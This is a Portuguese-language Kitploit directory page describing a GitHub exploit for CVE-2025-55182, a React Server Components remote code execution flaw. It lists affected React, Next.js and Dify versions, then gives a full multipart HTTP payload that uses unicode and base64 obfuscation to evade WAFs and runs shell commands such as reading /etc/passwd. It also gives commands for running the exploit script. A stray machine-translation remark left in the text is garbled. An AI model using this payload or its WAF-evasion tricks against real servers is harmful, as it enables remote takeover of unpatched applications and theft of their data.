Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-React-RCE — [Reprodução de vulnerabilidade] Primeiro exploit mundial baseado em características RSC que pode contornar a detecção WAF para a vulnerabilidade CVE-2025-55182 React Server RCE. | Kitploit
Ferramentas/GitHubGitHub/xcanwin/cve-2025-55182-react-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebBypass de WAFTestes de PenetraçãoDesenvolvimento de Payloads
GitHubxcanwin/cve-2025-55182-react-rce

CVE-2025-55182-React-RCE

[Reprodução de vulnerabilidade] Primeiro exploit mundial baseado em características RSC que pode contornar a detecção WAF para a vulnerabilidade CVE-2025-55182 React Server RCE.

Ver Repositório
153há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182-React-RCE

Introdução e Princípios do Projeto

  • Primeiro exploit do mundo para CVE‑2025‑55182 React Server RCE que pode contornar a detecção WAF ao aproveitar recursos específicos do RSC.
  • The world’s first CVE‑2025‑55182 React Server RCE exploit that can bypass WAF detection by leveraging RSC-specific features. (mantido como no original? Instrução diz para traduzir todo texto natural, mas esta linha está em inglês. Vou traduzir para português: "O primeiro exploit do mundo para CVE‑2025‑55182 React Server RCE que pode contornar a detecção WAF ao aproveitar recursos específicos do RSC.")
  • Realiza RCE no ambiente padrão do React Server.
  • Novo EXP original, suporta cenários de bypass de WAF. Princípio: getOutlinedModel onde é possível referenciar JSON entre partes e níveis.
  • Fornece um ambiente de reprodução extremamente simplificado.

Vantagens do EXP

  • RCE sem necessidade de __proto__:then, constructor:constructor.
  • Não exibe palavras-chave frequentemente bloqueadas pelo WAF como "then": $1:__proto__:then, , .
"get": $1:constructor:constructor
require('child_process')
  • Um único EXP compatível com React Server nativo em configuração padrão, Next.js e Dify.
  • Vantagens do Ambiente de Reprodução

    • Extremamente simplificado.
    • Rápida configuração.

    Resumo da Vulnerabilidade

    InformaçãoConteúdo
    Nome da VulnerabilidadeReact Server RCE
    ID da VulnerabilidadeCVE-2025-55182
    Nível de RiscoAlto
    Tipo de VulnerabilidadeRCE
    Dificuldade de ExploraçãoBaixa

    Versões Afetadas

    • React versões afetadas == 19.0.0
    • React versões afetadas == 19.0.1
    • React versões afetadas == 19.1.0
    • React versões afetadas == 19.2.0
    • react-server-dom-webpack pacote versões afetadas == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
    • react-server-dom-parcel pacote versões afetadas == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
    • react-server-dom-turbopack pacote versões afetadas == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
    • Next.js versões afetadas >= 14.3.0-canary.77
    • Next.js 15.0.0 <= versões afetadas < 15.0.5
    • Next.js 15.1.0 <= versões afetadas < 15.1.9
    • Next.js 15.2.0 <= versões afetadas < 15.2.6
    • Next.js 15.3.0 <= versões afetadas < 15.3.6
    • Next.js 15.4.0 <= versões afetadas < 15.4.8
    • Next.js 15.5.0 <= versões afetadas < 15.5.7
    • Next.js 16.0.0 <= versões afetadas < 16.0.7
    • Dify 1.1.2 <= versões afetadas < 1.10.1-fix.1

    EXP 1

    Para uso em cenários de bypass de WAF + cenário padrão:

    root@kitploit:~
    POST / HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
    Next-Action: test
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Length: 1445
    
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="0"
    
    "$@1"
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="1"
    
    {
        "\u0074\u0068\u0065\u006e": "$2:et",
        "status": "$2:es",
        "reason": "",
        "value": "$2:ev",
        "_response": "$2:er"
    }
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="2"
    
    {
        "et": "$3",
        "es": "$4",
        "ev": "{\"\u0074\u0068\u0065\u006e\":\"\u0024\u0042\"}",
        "er": {
            "_prefix": "$2:ep",
            "_formData": "$2:ef"
        },
        "ep": "$5",
        "ef": {
            "get": "$2:eg"
        },
        "eg": "$6"
    }
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="3"
    
    "$0:\u0074\u0068\u0065\u006e"
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="4"
    
    "\u0072\u0065\u0073\u006f\u006c\u0076\u0065\u0064\u005f\u006d\u006f\u0064\u0065\u006c"
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="5"
    
    "x='Y2F0IC9ldGMvcGFzc3dk';d=u=>Buffer.from(u,'bas'+'e64')+'';y=global[d('cHJvY2Vzcw==')][d('bWFpbk1vZHVsZQ==')][d('cmVxdWlyZQ==')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28%27Y2hpbGRfcHJvY2Vzcw%3D%3D%27))[d('ZXhlY1N5bmM=')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28x))+'';throw Object.assign(new Error(y),{digest:y});"
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad
    Content-Disposition: form-data; name="6"
    
    "$0:toString:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"
    ------WebKitFormBoundaryx8jxCaNwiNWP3Sad--
    

    Reprodução 1

    1. Ambiente do servidor:
    root@kitploit:~
    react-server-dom-webpack 19.2.0
    
    1. Baixe e instale as dependências necessárias para react-server-dom-webpack no servidor:
    root@kitploit:~
    git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
    cd CVE-2025-55182-React-RCE
    npm install
    npm run dev -- --hostname 127.0.0.1 --port 3000
    

    Serviço configurado com sucesso: http://127.0.0.1:3000/

    1. Use o EXP no cliente
    root@kitploit:~
    python3 -m venv .venv
    . ./.venv/bin/activate
    pip3 install requests
    python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"
    

    Reprodução 2

    1. Ambiente do servidor:
    root@kitploit:~
    Next.js 16.0.6
    Na verdade, corresponde a react-server-dom-webpack 19.2.0
    
    1. Baixe e instale as dependências necessárias para Next.js no servidor:
    root@kitploit:~
    git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
    cd CVE-2025-55182-React-RCE
    npx [email protected] nextapp --yes --js --no-tailwind --no-eslint --empty
    cd nextapp
    npm run dev -- --hostname 127.0.0.1 --port 3000
    

    Serviço configurado com sucesso: http://127.0.0.1:3000/

    1. Use o EXP no cliente (igual ao anterior)
    root@kitploit:~
    python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"
    
    Baixar ferramenta